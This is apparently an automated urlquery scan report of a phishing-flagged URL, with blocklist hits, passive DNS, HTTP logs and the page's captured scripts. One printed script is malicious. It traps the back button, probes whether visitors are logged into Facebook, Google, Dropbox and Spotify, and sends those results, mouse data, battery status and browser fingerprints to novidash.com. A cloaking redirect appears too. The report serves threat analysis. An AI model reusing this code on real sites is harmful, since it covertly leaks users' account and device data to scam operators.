Overview

URL dratingmaject.com/9f961cb1-cf52-4303-9131-56622bd15a1c
IP18.195.149.11
ASNAMAZON-02
Location Germany
Report completed2022-09-03 02:55:25 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-03 2 dratingmaject.com/9f961cb1-cf52-4303-9131-56622bd15a1c Phishing
2022-09-03 2 novidash.com/smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35 (...) Phishing
2022-09-03 2 novidash.com/smartlink-css/6312c212994913464d155879 Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

URL novidash.com/smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35 (...)
IP  188.240.52.20
Magic gzip compressed data, max compression\012- data
Size 20006
MD5 56f5d7f608e25d64207135f045f988cb
SHA1 901eb59372ae330ae85e1384da93479b21ae1082
SHA256 1910daea79e5a9d04829a91e432dfa56f45a80a3e14a8cf667fec73af9fd3d29
Analyzer Analysed Verdict Comment
VirusTotal 2022-06-17 23:01:02 0/56


Passive DNS (27)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS ocsp.sca1b.amazontrust.com (2) 1015 2017-03-03 15:20:51 UTC 2019-03-27 04:05:54 UTC 143.204.42.165
mnemonic passive DNS 0ee06.trknovi.com (3) 0 2022-08-12 16:04:54 UTC 2022-09-02 17:54:25 UTC 188.240.52.20 Unknown ranking
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-02 04:47:06 UTC 143.204.55.110
mnemonic passive DNS other.landerhd.com (6) 0 2022-06-20 15:26:20 UTC 2022-09-02 05:55:16 UTC 188.240.52.20 Unknown ranking
mnemonic passive DNS www.googletagmanager.com (1) 75 2012-12-25 14:52:06 UTC 2022-09-02 04:27:16 UTC 142.250.74.72
mnemonic passive DNS botd.fpapi.io (1) 297160 2021-06-11 10:56:14 UTC 2022-09-02 16:15:15 UTC 18.215.75.60
mnemonic passive DNS in.hotjar.com (1) 1746 2018-10-22 17:15:59 UTC 2022-09-02 04:30:43 UTC 34.251.112.219
mnemonic passive DNS www.spotify.com (1) 1130 2012-06-20 18:23:09 UTC 2022-09-02 12:11:07 UTC 35.186.224.25
mnemonic passive DNS r3.o.lencr.org (5) 344 2020-12-02 08:52:13 UTC 2022-09-02 04:26:06 UTC 23.36.77.32
mnemonic passive DNS ocsp.digicert.com (6) 86 2012-05-21 07:02:23 UTC 2022-09-02 23:15:48 UTC 93.184.220.29
mnemonic passive DNS dratingmaject.com (1) 821761 2021-08-30 08:46:03 UTC 2022-09-02 05:00:10 UTC 18.195.149.11
mnemonic passive DNS img-getpocket.cdn.mozilla.net (5) 1631 2017-09-01 03:40:57 UTC 2022-09-02 09:29:12 UTC 34.120.237.76
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-06-04 20:08:41 UTC 2022-09-02 20:19:28 UTC 143.204.55.115
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-02 04:27:28 UTC 34.117.237.239
mnemonic passive DNS use.fontawesome.com (2) 942 2017-01-30 04:43:25 UTC 2022-09-02 04:42:55 UTC 172.67.169.247
mnemonic passive DNS stats.g.doubleclick.net (1) 96 2013-06-02 22:47:44 UTC 2022-09-02 04:27:16 UTC 173.194.221.155
mnemonic passive DNS www.facebook.com (1) 99 2017-01-30 05:00:00 UTC 2022-09-02 04:26:55 UTC 31.13.72.36
mnemonic passive DNS novidash.com (5) 35171 2021-06-24 09:21:46 UTC 2022-09-02 21:54:09 UTC 188.240.52.20
mnemonic passive DNS static.hotjar.com (1) 641 2014-11-01 05:14:27 UTC 2022-09-02 04:30:43 UTC 54.230.111.113
mnemonic passive DNS ocsp.pki.goog (6) 175 2017-06-14 07:23:31 UTC 2022-09-02 04:25:33 UTC 142.250.74.3
mnemonic passive DNS vars.hotjar.com (1) 1014 2020-11-05 10:13:14 UTC 2022-09-02 12:20:33 UTC 143.204.55.118
mnemonic passive DNS cdn.jsdelivr.net (2) 439 2012-09-30 00:15:09 UTC 2022-09-02 04:30:45 UTC 151.101.85.229
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-02 04:36:08 UTC 34.214.110.180
mnemonic passive DNS accounts.google.com (3) 81 2016-09-05 09:39:47 UTC 2022-09-02 22:11:24 UTC 216.58.207.237
mnemonic passive DNS www.dropbox.com (1) 1994 2012-05-21 20:31:28 UTC 2022-09-02 11:50:55 UTC 162.125.71.18
mnemonic passive DNS accounts.spotify.com (1) 9553 2014-10-31 13:36:06 UTC 2022-09-03 01:54:33 UTC 35.186.224.25
mnemonic passive DNS ocsp.globalsign.com (1) 2075 2012-05-25 06:20:55 UTC 2022-09-02 05:04:26 UTC 104.18.21.226


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 18.195.149.11

Date UQ / IDS / BL URL IP
2022-11-30 02:00:19 +0000
0 - 0 - 1 dratingmaject.com/573ca57e-93c1-46c3-a4c2-fdf (...) 18.195.149.11
2022-11-29 22:23:25 +0000
0 - 0 - 2 dratingmaject.com/be592a9a-8b96-44a8-9a10-609 (...) 18.195.149.11
2022-11-29 19:15:03 +0000
0 - 0 - 2 dratingmaject.com/ad284c8c-8f8f-4908-83a3-658 (...) 18.195.149.11
2022-11-29 18:31:04 +0000
0 - 0 - 2 dratingmaject.com/8052cc7c-d65b-4b90-9f56-799 (...) 18.195.149.11
2022-11-29 15:30:48 +0000
0 - 0 - 2 dratingmaject.com/01838c12-23c8-4ff9-97e4-6b9 (...) 18.195.149.11

Last 5 reports on ASN: AMAZON-02

Date UQ / IDS / BL URL IP
2022-11-30 03:09:14 +0000
0 - 0 - 2 dtioykqj1u8de.cloudfront.net/prime/ref=nav_to (...) 54.230.218.214
2022-11-30 03:09:08 +0000
0 - 0 - 2 www.e-serviceparts.info/landingpages/cd6304a0 (...) 52.48.119.142
2022-11-30 03:07:07 +0000
0 - 0 - 10 www.your-prize.click/push/iPhone14/index.html (...) 54.230.111.123
2022-11-30 03:07:05 +0000
0 - 0 - 1 greatermediaphiladelphia.com/.WellsVerify/con (...) 3.18.7.81
2022-11-30 03:05:39 +0000
0 - 0 - 4 ww25.amidiscord.xyz/ 199.59.243.222

Last 5 reports on domain: dratingmaject.com

Date UQ / IDS / BL URL IP
2022-11-30 02:00:19 +0000
0 - 0 - 1 dratingmaject.com/573ca57e-93c1-46c3-a4c2-fdf (...) 18.195.149.11
2022-11-29 22:23:25 +0000
0 - 0 - 2 dratingmaject.com/be592a9a-8b96-44a8-9a10-609 (...) 18.195.149.11
2022-11-29 19:15:03 +0000
0 - 0 - 2 dratingmaject.com/ad284c8c-8f8f-4908-83a3-658 (...) 18.195.149.11
2022-11-29 18:31:04 +0000
0 - 0 - 2 dratingmaject.com/8052cc7c-d65b-4b90-9f56-799 (...) 18.195.149.11
2022-11-29 15:30:48 +0000
0 - 0 - 2 dratingmaject.com/01838c12-23c8-4ff9-97e4-6b9 (...) 18.195.149.11

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-11-08 08:17:00 +0000
0 - 0 - 3 other.landerhd.com/924553162 188.240.52.20
2022-11-07 17:56:04 +0000
0 - 0 - 2 other.landerhq.com/924349113 188.240.52.20
2022-11-06 20:55:27 +0000
0 - 0 - 2 other.landerhd.com/923950036 188.240.52.20
2022-11-06 06:01:38 +0000
0 - 0 - 2 other.landerhd.com/923686280 188.240.52.20
2022-11-04 22:52:13 +0000
0 - 0 - 3 other.landerhd.com/923242532 188.240.52.20


JavaScript

Executed Scripts (12)


Executed Evals (2)

#1 JavaScript::Eval (size: 523, repeated: 1) - SHA256: 3d42eee9415522f4e95fcea0cc832841777e9c595370e8a64ddd028a43a6a903

                                        if (window.location.hostname != "other.landerhd.com") {
    window.location.replace("http://novidash.com/smartlink?user_id=3&source_type=cloak&media_type=other&vertical=other")
}

function onMouseOut(event) {
    if (event.clientY < 50 && event.relatedTarget == null && event.target.nodeName.toLowerCase() !== "select") {
        document.removeEventListener("mouseout", onMouseOut);
        document.getElementById("popup").style.display = "block"
    }
}
document.addEventListener("mouseout", onMouseOut);

function hide(target) {
    document.getElementById(target).style.display = "none"
}
                                    

#2 JavaScript::Eval (size: 5798, repeated: 1) - SHA256: b76f8c8891ef6ba18c376c010c83db67db39ab9eb1f85aa450c7cd0d01d94172

                                        var back_url = "http://novidash.com/smartlink?user_id=1379&source_type=back&media_type=mainstream&vertical=other&click_id=wumnpcku2gu4m2pii7rf3oas&traffic_source_id=0&tracker_id=0&is_rtb_campaign=0&creative_id=290720&from_id=899637196";
var visit_id = "899637196";
var mongo_id = "6312c212994913464d155879";
var domain = "https://novidash.com";
if (typeof domain === 'undefined') {
    var domain = "https://novidash.com"
}! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#');
        onpopstate = function(event) {
            event.state && location.replace(back_url)
        }
    } catch (o) {
        console.log(o)
    }
}();
const div = document.createElement('div');
div.style = "display:none";
div.innerHTML = '<a href="' + domain + '/click/' + visit_id + '?hp">Continue</a>' + '<form action="' + domain + '/click/' + visit_id + '?hp" method="GET">' + '<input type="text" name="email" />' + '<input type="submit" />' + '</form>';
document.body.insertBefore(div, document.body.firstChild);

function activityWatcher() {
    var active = 0;

    function activity() {
        if (active == 0 && visit_id) {
            var xhttp = new XMLHttpRequest();
            xhttp.open("GET", domain + "/landing-interaction/" + visit_id, true);
            xhttp.send()
        }
        active = 1
    }
    var activityEvents = ['mousedown', 'mousemove', 'keydown', 'scroll', 'touchstart'];
    activityEvents.forEach(function(eventName) {
        document.addEventListener(eventName, activity, true)
    })
}
activityWatcher();
var leakSocialMediaAccounts = function(callback) {
    var platforms = [{
        domain: "https://www.facebook.com",
        redirect: "/login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp",
        name: "Facebook"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=en&service=mail",
        name: "Gmail"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&uilel=3&hl=en&service=youtube",
        name: "Youtube"
    }, {
        domain: "https://www.dropbox.com",
        redirect: "/login?cont=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fimages%2Ficons%2Ficon_spacer-vflN3BYt2.gif",
        name: "Dropbox"
    }, {
        domain: "https://www.spotify.com",
        redirect: "/de/login/?forward_url=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico",
        name: "Spotify"
    }];
    platforms.forEach(function(network) {
        var img = document.createElement('img');
        img.referrerPolicy = 'no-referrer';
        img.src = network.domain + network.redirect;
        img.onload = function() {
            callback(network, true)
        };
        img.onerror = function() {
            callback(network, false)
        }
    })
};

function displayResult(network, loggedIn) {
    if (loggedIn == true) {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?social_account=" + network.name, true);
        xhttp.send()
    }
}
leakSocialMediaAccounts(displayResult);
var mousePos;
var previousPos;
var mouseLog = [];
var mouseClickLog = [];
var mouseMovements = 0;
var mouseDistinctMovements = 0;
var mouseDistance = 0;
var mouseClicks = 0;
var mouseActive = 0;
var mouseActivePercentage = 0;
var mouseSpeed = 0;
var mouseSpeedTotal = 0;
var mouseTime = 0;
(function() {
    document.onmousemove = handleMouseMove;
    setInterval(getMousePosition, 500);

    function handleMouseMove(event) {
        var dot, eventDoc, doc, body, pageX, pageY;
        event = event || window.event;
        if (event.pageX == null && event.clientX != null) {
            eventDoc = (event.target && event.target.ownerDocument) || document;
            doc = eventDoc.documentElement;
            body = eventDoc.body;
            event.pageX = event.clientX + (doc && doc.scrollLeft || body && body.scrollLeft || 0) - (doc && doc.clientLeft || body && body.clientLeft || 0);
            event.pageY = event.clientY + (doc && doc.scrollTop || body && body.scrollTop || 0) - (doc && doc.clientTop || body && body.clientTop || 0)
        }
        mousePos = {
            x: event.pageX,
            y: event.pageY
        }
    }
    document.onclick = handleMouseClick;

    function handleMouseClick(event) {
        mouseClicks++
    }

    function getMousePosition() {
        var pos = mousePos;
        if (!pos) {} else {
            if (pos != previousPos) {
                if (mouseLog.indexOf(pos.x + "x" + pos.y) == -1) {
                    mouseDistinctMovements++
                }
                mouseLog.push(pos.x + "x" + pos.y);
                mouseMovements++;
                mouseActive += 0.5;
                if (previousPos) {
                    xDiff = Math.abs(pos.x - previousPos.x);
                    yDiff = Math.abs(pos.y - previousPos.y);
                    mouseDistance += xDiff + yDiff;
                    mouseSpeedTotal += ((xDiff + yDiff) / 0.5) * 2;
                    mouseSpeed = Math.round(mouseSpeedTotal / mouseMovements)
                }
            }
        }
        mouseTime += 0.5;
        mouseActivePercentage = (mouseActive / mouseTime) * 100;
        previousPos = pos
    }
})();
var secsOnPage = 0;
var pingInterval = 1;
setTimeout(function trun() {
    secsOnPage += pingInterval;
    if ((secsOnPage < 60 && secsOnPage % 1 == 0) || (secsOnPage % 50 == 0)) {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?sop=" + secsOnPage + "&mouse_movements=" + mouseMovements + "&mouse_distance=" + mouseDistance + "&mouse_clicks=" + mouseClicks + "&mouse_active=" + mouseActivePercentage + "&mouse_speed=" + mouseSpeed, true);
        xhttp.send()
    }
    if (secsOnPage <= 300) setTimeout(trun, pingInterval * 1000)
}, pingInterval * 1000);
if ('getBattery' in navigator) {
    navigator.getBattery().then((battery) => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("GET", domain + "/smartlink-css/" + mongo_id + "?battery_charging=" + battery.charging + "&battery_chargingTime=" + battery.chargingTime + "&battery_dischargingTime=" + battery.dischargingTime + "&battery_level=" + battery.level, true);
        xhttp.send()
    })
}

function initFingerprintJS() {
    const fpPromise = FingerprintJS.load();
    fpPromise.then(fp => fp.get()).then(result => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("POST", domain + "/smartlink-css/" + mongo_id + "?fingerprintid=" + result.visitorId, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("_token={{ csrf_token() }}&fingerprintjs=" + JSON.stringify(result.components))
    }).catch(error => console.error(error))
}

function initBotd() {
    const botdPromise = Botd.load({
        token: "HtazsqGCe7nkVaIHchA",
        mode: "allData"
    });
    botdPromise.then(botd => botd.detect()).then(result => {
        var xhttp = new XMLHttpRequest();
        xhttp.open("POST", domain + "/smartlink-css/" + mongo_id, true);
        xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhttp.send("_token={{ csrf_token() }}&fingerprintbot=" + JSON.stringify(result))
    }).catch(error => console.error(error))
}
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 14, repeated: 1) - SHA256: d3de569b7c2f7f122fba8046d966cd109673d0c87ac58412c3d64f2b2a4c0649

                                        September 2022
                                    


HTTP Transactions (62)


Request Response
                                        
                                            GET /9f961cb1-cf52-4303-9131-56622bd15a1c HTTP/1.1 
Host: dratingmaject.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         18.195.149.11
HTTP/1.1 302
                                        
Server: nginx
Date: Sat, 03 Sep 2022 02:55:13 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://0ee06.trknovi.com/smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61
Pragma: no-cache
Set-Cookie: 9f961cb1-cf52-4303-9131-56622bd15a1c-v4=opaOZmZ8k1l3t50SkyRFVd9CxaOw9BwHFKDjAiT7T6Y; Max-Age=86400; Expires=Sun, 04-Sep-2022 02:55:13 GMT; Domain=dratingmaject.com; Path=/; HttpOnly cc-v4=6ts2yeMIv%2FK4uTaoYtlvfA48Wx%2BmM6ZtdwvdlGr%2FyH4pCrZAYMTtsVYItwZISADEEz6ixcHhjubzz4Ou9ItkDimgpCWMyddAyr%2F0f69XDGVzNhvoBbQ%2F8NQQuTAH9r2YOfin5U1WRuaBgBSmLNhcWg%3D%3D; Max-Age=31536000; Expires=Sun, 03-Sep-2023 02:55:13 GMT; Domain=dratingmaject.com; Path=/; HttpOnly


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Content-Length, Backoff, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Sat, 03 Sep 2022 02:42:45 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 4f01f770085624552bc30a98954f963a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 1GQKwGEct93PclHmLyThED4ZDJMTLACeGVqmpn6oyNq3pKNnDbgz_A==
Age: 749


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    99b7d23c1748d0526782b9ff9ea45f09
Sha1:   eadd801a3ba2aa00632c6fb52e1f9125bd6d5b4f
Sha256: 48f81668f76955320480b484138aebdad5d03c471036b4449c737aca1ecab08e
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "9B43EC48B16F96449208A0094C4D660806A2A2D344B5862DBFF4C393BF3F9F9F"
Last-Modified: Thu, 01 Sep 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14493
Expires: Sat, 03 Sep 2022 06:56:47 GMT
Date: Sat, 03 Sep 2022 02:55:14 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.110
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Sat, 03 Sep 2022 01:15:18 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 a9120cc3ff449047c990e82a4d5566ba.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: dx5NzQdL8yfsY61L3oC6hTuEsp5nSgVBYz3Pr4D6q_9jecs1liw27g==
age: 5997
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Sat, 03 Sep 2022 02:55:14 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Retry-After, ETag, Backoff, Last-Modified, Pragma, Cache-Control, Expires, Content-Type, Content-Length, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Sat, 03 Sep 2022 02:38:17 GMT
Cache-Control: max-age=3600
Expires: Sat, 03 Sep 2022 03:29:34 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 dac7cf040932e0c072eeed10afdd7b3e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: RcPznDIQp88azK2DmhrlFYpZhI9TqHzO6W5G1Mjw3i_KBKFE-FPCtQ==
Age: 1018


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /npm/@fingerprintjs/fingerprintjs@3/dist/fp.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=604800, s-maxage=43200
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 3.3.5
x-jsd-version-type: version
etag: W/"8392-Rfi4DUKsZmgOw+7TcNmFhcx8ixc"
content-encoding: gzip
accept-ranges: bytes
date: Sat, 03 Sep 2022 02:55:15 GMT
age: 6712
x-served-by: cache-fra19145-FRA, cache-bma1648-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
content-length: 14137
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (33348)
Size:   14137
Md5:    e7b94e944315bb48c9b9820ad324718d
Sha1:   f77317565b6243287bd3ee74fe96a9632fef559a
Sha256: 4c8e188a605e3090b34c87622bf7038d6699cb06af2f242eb77843ff3966f97a
                                        
                                            GET /landingpages/mcafee/os_versions.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 3073
last-modified: Wed, 31 Aug 2022 12:57:34 GMT
etag: "630f5abe-c01"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 135 x 26, 8-bit/color RGBA, interlaced\012- data
Size:   3073
Md5:    e662ac219b9626c6488250a2b09640c5
Sha1:   45636878adece610ed4d2c44bb177ac53e68adfb
Sha256: cb28be8a2c6c7ef36afd59c211b5a1f50ad26229c14ae714c39df687c96ab823
                                        
                                            GET /npm/@fpjs-incubator/botd-agent@0/dist/botd.min.js HTTP/1.1 
Host: cdn.jsdelivr.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.85.229
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
access-control-allow-origin: *
access-control-expose-headers: *
timing-allow-origin: *
cache-control: public, max-age=604800, s-maxage=43200
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-jsd-version: 0.1.20
x-jsd-version-type: version
etag: W/"2349-ZoOIlhfcFugXpJwXzjjzWO/fFjg"
content-encoding: gzip
accept-ranges: bytes
date: Sat, 03 Sep 2022 02:55:15 GMT
age: 20303
x-served-by: cache-fra19148-FRA, cache-bma1648-BMA
x-cache: HIT, HIT
vary: Accept-Encoding
content-length: 3067
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (8836)
Size:   3067
Md5:    b066530dd980f68abf6d92414bc4c7ed
Sha1:   34ad41df121cf682a0471d60e19ca4590fb5314f
